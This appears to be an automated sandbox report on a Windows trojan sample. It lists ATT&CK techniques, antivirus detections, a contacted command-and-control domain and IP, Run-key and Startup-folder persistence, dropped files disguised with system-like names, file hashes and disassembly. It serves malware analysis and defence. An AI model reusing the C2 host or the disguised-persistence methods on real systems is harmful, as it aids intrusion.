Cloud Accounts	Cron	Registry Run Keys / Startup Folder2	Valid Accounts2	DLL Side-Loading1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol1	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Access Token Manipulation21	Masquerading12	Cached Domain Credentials	Security Software Discovery41	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol11	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Process Injection412	Valid Accounts2	DCSync	Virtualization/Sandbox Evasion4	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Registry Run Keys / Startup Folder2	Virtualization/Sandbox Evasion4	Proc Filesystem	Process Discovery3	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Access Token Manipulation21	/etc/passwd and /etc/shadow	Application Window Discovery11	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Process Injection412	Network Sniffing	System Owner/User Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Hidden Files and Directories1	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
e5bd3238d220c97cd4d6969abb3b33e0.exe	69%	ReversingLabs	Win32.Trojan.Nymeria
e5bd3238d220c97cd4d6969abb3b33e0.exe	100%	Avira	HEUR/AGEN.1100084

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat	100%	Avira	HEUR/AGEN.1100084
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	0%	Metadefender		Browse
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.0.e5bd3238d220c97cd4d6969abb3b33e0.exe.9c0000.0.unpack	100%	Avira	HEUR/AGEN.1100084	Download File
0.2.e5bd3238d220c97cd4d6969abb3b33e0.exe.9c0000.0.unpack	100%	Avira	HEUR/AGEN.1100084	Download File
1.2.RegAsm.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
12.2.DiagnosticsHub.StandardCollector.Service.exe.bat.980000.0.unpack	100%	Avira	HEUR/AGEN.1100084	Download File
12.0.DiagnosticsHub.StandardCollector.Service.exe.bat.980000.0.unpack	100%	Avira	HEUR/AGEN.1100084	Download File
12.3.DiagnosticsHub.StandardCollector.Service.exe.bat.bd0000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
0.3.e5bd3238d220c97cd4d6969abb3b33e0.exe.40b0000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File
14.2.RegAsm.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen7	Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
windowslivesoffice.ddns.net	87.65.28.27	true	true		unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
87.65.28.27	unknown	Belgium		5432	PROXIMUS-ISP-ASBE	true

Private

IP
127.0.0.1

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	320085
Start date:	19.11.2020
Start time:	01:51:24
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	e5bd3238d220c97cd4d6969abb3b33e0 (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@8/7@6/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 2.9% (good quality ratio 2.7%) Quality average: 69.9% Quality standard deviation: 21.2%
HCA Information:	Successful, ratio: 70% Number of executed functions: 67 Number of non-executed functions: 273
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 13.88.21.125, 104.43.139.144, 168.61.161.212, 52.255.188.83, 2.20.84.85, 104.43.193.48, 51.104.144.132, 2.23.155.128, 2.23.155.153, 51.103.5.159, 95.101.22.125, 95.101.22.134, 52.155.217.156, 20.54.26.129, 51.104.139.180 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, skypedataprdcoleus17.cloudapp.net, skypedataprdcolwus15.cloudapp.net Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/320085/sample/e5bd3238d220c97cd4d6969abb3b33e0.exe

Simulations

Behavior and APIs

Time	Type	Description
01:52:29	API Interceptor	1006x Sleep call for process: RegAsm.exe modified
01:52:30	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
01:52:38	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinSAT.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
87.65.28.27	1c2dec9cbfcd95afe13bf71910fdf95f.exe	Get hash	malicious	Browse
	Xf6v0G2wIM.exe	Get hash	malicious	Browse
	jztWD1iKrC.exe	Get hash	malicious	Browse
	wH22vdkhhU.exe	Get hash	malicious	Browse
	AqpOn6nwXS.exe	Get hash	malicious	Browse
	CklrD7MYX2.exe	Get hash	malicious	Browse
	FahZG6Pdc4.exe	Get hash	malicious	Browse
	61WlCsQR9Q.exe	Get hash	malicious	Browse
	U7DiqWP9qu.exe	Get hash	malicious	Browse
	d4x5rI09A7.exe	Get hash	malicious	Browse
	1WW425NrsA.exe	Get hash	malicious	Browse
	Kyd6mztyQ5.exe	Get hash	malicious	Browse
	xdNg7FUNS2.exe	Get hash	malicious	Browse
	14muK1SuRQ.exe	Get hash	malicious	Browse
	9fPECeVI6R.exe	Get hash	malicious	Browse
	EkOjz981VJ.exe	Get hash	malicious	Browse
	2WSPzeEKDI.exe	Get hash	malicious	Browse
	wDbrNH1KqV.exe	Get hash	malicious	Browse
	btxqAmncf4.exe	Get hash	malicious	Browse
	plMS4K3264.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
windowslivesoffice.ddns.net	1c2dec9cbfcd95afe13bf71910fdf95f.exe	Get hash	malicious	Browse	87.65.28.27
	Xf6v0G2wIM.exe	Get hash	malicious	Browse	87.65.28.27
	jztWD1iKrC.exe	Get hash	malicious	Browse	87.65.28.27
	wH22vdkhhU.exe	Get hash	malicious	Browse	87.65.28.27
	AqpOn6nwXS.exe	Get hash	malicious	Browse	87.65.28.27
	CklrD7MYX2.exe	Get hash	malicious	Browse	87.65.28.27
	FahZG6Pdc4.exe	Get hash	malicious	Browse	87.65.28.27
	61WlCsQR9Q.exe	Get hash	malicious	Browse	87.65.28.27
	U7DiqWP9qu.exe	Get hash	malicious	Browse	87.65.28.27
	d4x5rI09A7.exe	Get hash	malicious	Browse	87.65.28.27
	1WW425NrsA.exe	Get hash	malicious	Browse	87.65.28.27
	Kyd6mztyQ5.exe	Get hash	malicious	Browse	87.65.28.27
	xdNg7FUNS2.exe	Get hash	malicious	Browse	87.65.28.27
	14muK1SuRQ.exe	Get hash	malicious	Browse	87.65.28.27
	9fPECeVI6R.exe	Get hash	malicious	Browse	87.65.28.27
	EkOjz981VJ.exe	Get hash	malicious	Browse	87.65.28.27
	2WSPzeEKDI.exe	Get hash	malicious	Browse	87.65.28.27
	wDbrNH1KqV.exe	Get hash	malicious	Browse	87.65.28.27
	btxqAmncf4.exe	Get hash	malicious	Browse	87.65.28.27
	plMS4K3264.exe	Get hash	malicious	Browse	87.65.28.27

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
PROXIMUS-ISP-ASBE	1c2dec9cbfcd95afe13bf71910fdf95f.exe	Get hash	malicious	Browse	87.65.28.27
	Xf6v0G2wIM.exe	Get hash	malicious	Browse	87.65.28.27
	jztWD1iKrC.exe	Get hash	malicious	Browse	87.65.28.27
	wH22vdkhhU.exe	Get hash	malicious	Browse	87.65.28.27
	AqpOn6nwXS.exe	Get hash	malicious	Browse	87.65.28.27
	CklrD7MYX2.exe	Get hash	malicious	Browse	87.65.28.27
	FahZG6Pdc4.exe	Get hash	malicious	Browse	87.65.28.27
	WZ1j9bqSlV.exe	Get hash	malicious	Browse	81.241.22.161
	61WlCsQR9Q.exe	Get hash	malicious	Browse	87.65.28.27
	U7DiqWP9qu.exe	Get hash	malicious	Browse	87.65.28.27
	d4x5rI09A7.exe	Get hash	malicious	Browse	87.65.28.27
	1WW425NrsA.exe	Get hash	malicious	Browse	87.65.28.27
	Kyd6mztyQ5.exe	Get hash	malicious	Browse	87.65.28.27
	xdNg7FUNS2.exe	Get hash	malicious	Browse	87.65.28.27
	14muK1SuRQ.exe	Get hash	malicious	Browse	87.65.28.27
	9fPECeVI6R.exe	Get hash	malicious	Browse	87.65.28.27
	EkOjz981VJ.exe	Get hash	malicious	Browse	87.65.28.27
	2WSPzeEKDI.exe	Get hash	malicious	Browse	87.65.28.27
	wDbrNH1KqV.exe	Get hash	malicious	Browse	87.65.28.27
	btxqAmncf4.exe	Get hash	malicious	Browse	87.65.28.27

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	1c2dec9cbfcd95afe13bf71910fdf95f.exe	Get hash	malicious	Browse
	Xf6v0G2wIM.exe	Get hash	malicious	Browse
	jztWD1iKrC.exe	Get hash	malicious	Browse
	wH22vdkhhU.exe	Get hash	malicious	Browse
	AqpOn6nwXS.exe	Get hash	malicious	Browse
	CklrD7MYX2.exe	Get hash	malicious	Browse
	FahZG6Pdc4.exe	Get hash	malicious	Browse
	61WlCsQR9Q.exe	Get hash	malicious	Browse
	U7DiqWP9qu.exe	Get hash	malicious	Browse
	d4x5rI09A7.exe	Get hash	malicious	Browse
	1WW425NrsA.exe	Get hash	malicious	Browse
	Kyd6mztyQ5.exe	Get hash	malicious	Browse
	xdNg7FUNS2.exe	Get hash	malicious	Browse
	14muK1SuRQ.exe	Get hash	malicious	Browse
	9fPECeVI6R.exe	Get hash	malicious	Browse
	EkOjz981VJ.exe	Get hash	malicious	Browse
	2WSPzeEKDI.exe	Get hash	malicious	Browse
	wDbrNH1KqV.exe	Get hash	malicious	Browse
	btxqAmncf4.exe	Get hash	malicious	Browse
	plMS4K3264.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	53248
Entropy (8bit):	4.490095782293901
Encrypted:	false
SSDEEP:	768:0P2Bbv+VazyoD2z9TU//1mz1+M9GnLEu+2wTFRJS8Ulg:HJv46yoD2BTNz1+M9GLfOw8UO
MD5:	529695608EAFBED00ACA9E61EF333A7C
SHA1:	68CA8B6D8E74FA4F4EE603EB862E36F2A73BC1E5
SHA-256:	44F129DE312409D8A2DF55F655695E1D48D0DB6F20C5C7803EB0032D8E6B53D0
SHA-512:	8FE476E0185B2B0C66F34E51899B932CB35600C753D36FE102BDA5894CDAA58410044E0A30FDBEF76A285C2C75018D7C5A9BA0763D45EC605C2BBD1EBB9ED674
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 1c2dec9cbfcd95afe13bf71910fdf95f.exe, Detection: malicious, Browse Filename: Xf6v0G2wIM.exe, Detection: malicious, Browse Filename: jztWD1iKrC.exe, Detection: malicious, Browse Filename: wH22vdkhhU.exe, Detection: malicious, Browse Filename: AqpOn6nwXS.exe, Detection: malicious, Browse Filename: CklrD7MYX2.exe, Detection: malicious, Browse Filename: FahZG6Pdc4.exe, Detection: malicious, Browse Filename: 61WlCsQR9Q.exe, Detection: malicious, Browse Filename: U7DiqWP9qu.exe, Detection: malicious, Browse Filename: d4x5rI09A7.exe, Detection: malicious, Browse Filename: 1WW425NrsA.exe, Detection: malicious, Browse Filename: Kyd6mztyQ5.exe, Detection: malicious, Browse Filename: xdNg7FUNS2.exe, Detection: malicious, Browse Filename: 14muK1SuRQ.exe, Detection: malicious, Browse Filename: 9fPECeVI6R.exe, Detection: malicious, Browse Filename: EkOjz981VJ.exe, Detection: malicious, Browse Filename: 2WSPzeEKDI.exe, Detection: malicious, Browse Filename: wDbrNH1KqV.exe, Detection: malicious, Browse Filename: btxqAmncf4.exe, Detection: malicious, Browse Filename: plMS4K3264.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....{Z..................... .......... ........@.. ..............................N.....@.....................................O................................... ................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\RegAsm.exe.log Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	525
Entropy (8bit):	5.2874233355119316
Encrypted:	false
SSDEEP:	12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk70Ug+9Yz9tv:MLF20NaL329hJ5g522rWz2T
MD5:	61CCF53571C9ABA6511D696CB0D32E45
SHA1:	A13A42A20EC14942F52DB20FB16A0A520F8183CE
SHA-256:	3459BDF6C0B7F9D43649ADAAF19BA8D5D133BCBE5EF80CF4B7000DC91E10903B
SHA-512:	90E180D9A681F82C010C326456AC88EBB89256CC769E900BFB4B2DF92E69CA69726863B45DFE4627FC1EE8C281F2AF86A6A1E2EF1710094CCD3F4E092872F06F
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\dhcpmon.exe.log Download File
Process:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	20
Entropy (8bit):	3.6841837197791887
Encrypted:	false
SSDEEP:	3:QHXMKas:Q3Las
MD5:	B3AC9D09E3A47D5FD00C37E075A70ECB
SHA1:	AD14E6D0E07B00BD10D77A06D68841B20675680B
SHA-256:	7A23C6E7CCD8811ECDF038D3A89D5C7D68ED37324BAE2D4954125D9128FA9432
SHA-512:	09B609EE1061205AA45B3C954EFC6C1A03C8FD6B3011FF88CF2C060E19B1D7FD51EE0CB9D02A39310125F3A66AA0146261BDEE3D804F472034DF711BC942E316
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	Non-ISO extended-ASCII text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:E+D9t:EC
MD5:	71E7E5A952207AD4C834CB50F9196BF5
SHA1:	67B0CB7D231B6150B1E3B9EF7956CCF78323C602
SHA-256:	D582023DF0402BFBC4DC155D133389866BDD68811EC682ACFADAB8B04E971848
SHA-512:	A69BCFF8AD1CAC8AE06C25742AD00C2B3C6132E778B25A3A79A3568F18B6CEA67ABC78178435930361764DC9F754963226E4DB5C097386E282E5BBD8BBC51D86
Malicious:	true
Reputation:	low
Preview:	Y0..p..H

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinSAT.lnk Download File
Process:	C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Nov 19 08:52:25 2020, mtime=Thu Nov 19 08:52:25 2020, atime=Thu Nov 19 08:52:25 2020, length=1124896, window=hide
Category:	dropped
Size (bytes):	1053
Entropy (8bit):	5.04565390227356
Encrypted:	false
SSDEEP:	12:84W1y4GL4OkwCgUCI0J5RPIqsFwojEjAJmhy52t6RPIqsFw2wuLYch44t2Y+xIBx:84QGLIwrhnHNsQAJgE2t6N2xw7aB6m
MD5:	DA2663B8526516E9BC52B90858834764
SHA1:	9F97A2B56820D1783EE72F46337F72D9A62854D0
SHA-256:	441121ACEBD6A0F3D3D3EFDD951C5006C5F00D47F727DF64E0D5222E3A35B49E
SHA-512:	40AB2E91FC2D984B582433F394369BC2157F4172E18C311AFF14D7FAC59E5A8EDB1603273534B1F086F8C026641CC8A9FA49EE67B816E24F0148D33D7B4EE4C7
Malicious:	false
Reputation:	low
Preview:	L..................F.... .....o.Y.....v.Y.....v.Y... ......................j.:..DG..Yr?.D..U..k0.&...&......7...#-....o.Y...T..Y.......t...CFSF..1.....sQ.N..hdwwiz....t.Y^...H.g.3..(.....gVA.G..k...>......sQ.NsQ.N.....S....................@...h.d.w.w.i.z...B...2. ..sQ.N .DIAGNO~1.BAT.........sQ.NsQ.N.....W....................-n..D.i.a.g.n.o.s.t.i.c.s.H.u.b...S.t.a.n.d.a.r.d.C.o.l.l.e.c.t.o.r...S.e.r.v.i.c.e...e.x.e...b.a.t.......y...............-.......x...........7.>......C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat..L.....\.....\.....\.....\.....\.....\.....\.h.d.w.w.i.z.\.D.i.a.g.n.o.s.t.i.c.s.H.u.b...S.t.a.n.d.a.r.d.C.o.l.l.e.c.t.o.r...S.e.r.v.i.c.e...e.x.e...b.a.t.........\|....I.J.H..K..:...`.......X.......910646...........!a..%.H.VZAj...ER..0............!a..%.H.VZAj...ER..0.......................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD

C:\Users\user\hdwwiz\DiagnosticsHub.StandardCollector.Service.exe.bat Download File
Process:	C:\Users\user\Desktop\e5bd3238d220c97cd4d6969abb3b33e0.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1124896
Entropy (8bit):	7.082489952218431
Encrypted:	false
SSDEEP:	24576:7qybFRXWsNAxCA9dpftQyNE12mHanc5vuZoX2lPA5o:bRWCoBQAEgYanc5vmo2uo
MD5:	E10CD6FAB33374FB1A0002F89D0BFE45
SHA1:	FF0DA20AEB8161B6053C800D2F68BDD34CCECA58
SHA-256:	B5894CBBC3810CD2BB086AE75D02D8A3B84FA370FC8F5EEE4967C99D82D2DD69
SHA-512:	93E8D12CC55182C93DE23DE49078CD0596C334C5F796AABC02107AF99B7369EC30DB610F229A974C276757F959F65352B583A951ED1F7CE52CCA7F30A11962FB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L......\.........."..........@....................@.................................p.....@...@.......@.........................\|........\|......................4q...+..............................PK..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc....\|.......~...4..............@..@.reloc..4q.......r..................@..B........................................................................................................................................................................................................................................................................................

\Device\ConDrv Download File
Process:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1010
Entropy (8bit):	4.298581893109255
Encrypted:	false
SSDEEP:	24:zKTDwL/0XZd3Wo3opQ5ZKBQFYVgt7ovrNOYlK:zKTDwAXZxo4ABV+SrUYE
MD5:	367EEEC425FE7E80B723298C447E2F22
SHA1:	3873DFC88AF504FF79231FE2BF0E3CD93CE45195
SHA-256:	481A7A3CA0DD32DA4772718BA4C1EF3F01E8D184FE82CF6E9C5386FD343264BC
SHA-512:	F7101541D87F045E9DBC45941CDC5A7F97F3EFC29AC0AF2710FC24FA64F0163F9463DE373A5D2BE1270126829DE81006FB8E764186374966E8D0E9BB35B7D7D6
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	Microsoft (R) .NET Framework Assembly Registration Utility 2.0.50727.8922..Copyright (C) Microsoft Corporation 1998-2004. All rights reserved.....Syntax: RegAsm AssemblyName [Options]..Options:.. /unregister Unregister types.. /tlb[:FileName] Export the assembly to the specified type library.. and register it.. /regfile[:FileName] Generate a reg file with the specified name.. instead of registering the types. This option.. cannot be used with the /u or /tlb options.. /codebase Set the code base in the registry.. /registered Only refer to already registered type libraries.. /asmpath:Directory Look for assembly references here.. /nologo Prevents RegAsm from displaying logo.. /silent Silent mode. Prevents displaying of success messages.. /verbose Displays extra information.. /? or /help Display this usage

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.082492111436444
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	e5bd3238d220c97cd4d6969abb3b33e0.exe
File size:	1124888
MD5:	7b00ed250c793c95f4d98c637302fb6f
SHA1:	7f8d0c101fa8c5e875aa76c9a9c139d8800867b3
SHA256:	5108996bad93e37f7f6e003be1edf9dba10a99fafc3894f8d4fd01226e10b0a5
SHA512:	dfb155952d9da0b0dffebe232de3e6dbf1fb130cdfb32569a2e3272634a15f42b9a04036c8d796a47e031a7f8c841e25f502df3a86b151d313a7a0fc5ef4768a
SSDEEP:	24576:7qybFRXWsNAxCA9dpftQyNE12mHanc5vuZoX2lPA5K:bRWCoBQAEgYanc5vmo2uK
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

File Icon


Icon Hash:	aab2e3e39383aa00

Static PE Info

General
Entrypoint:	0x42800a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE
Time Stamp:	0x5CF3C8E6 [Sun Jun 2 13:02:30 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F6DA0CF531Dh
jmp 00007F6DA0CE80D4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
push ecx
pop eax
push ecx
pop edx
add eax, esi
cmp edi, esi
jbe 00007F6DA0CE825Ah
cmp edi, eax
jc 00007F6DA0CE85BEh
bt dword ptr [004C41FCh], 01h
jnc 00007F6DA0CE8259h
rep movsb
jmp 00007F6DA0CE856Ch
cmp ecx, 00000080h
jc 00007F6DA0CE8424h
push edi
pop eax
xor eax, esi
test eax, 0000000Fh
jne 00007F6DA0CE8260h
bt dword ptr [004BF324h], 01h
jc 00007F6DA0CE8730h
bt dword ptr [004C41FCh], 00000000h
jnc 00007F6DA0CE83FDh
test edi, 00000003h
jne 00007F6DA0CE840Eh
test esi, 00000003h
jne 00007F6DA0CE83EDh
bt edi, 02h
jnc 00007F6DA0CE825Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F6DA0CE8263h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F6DA0CE82B5h
bt esi, 03h

Rich Headers

Programming Language:

[ C ] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[LNK] VS2013 UPD5 build 40629
[ASM] VS2013 UPD5 build 40629
[C++] VS2013 build 21005
[ASM] VS2013 build 21005
[RES] VS2013 build 21005
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbc0cc	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc8000	0x47cbc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x110000	0x7134	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4b50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
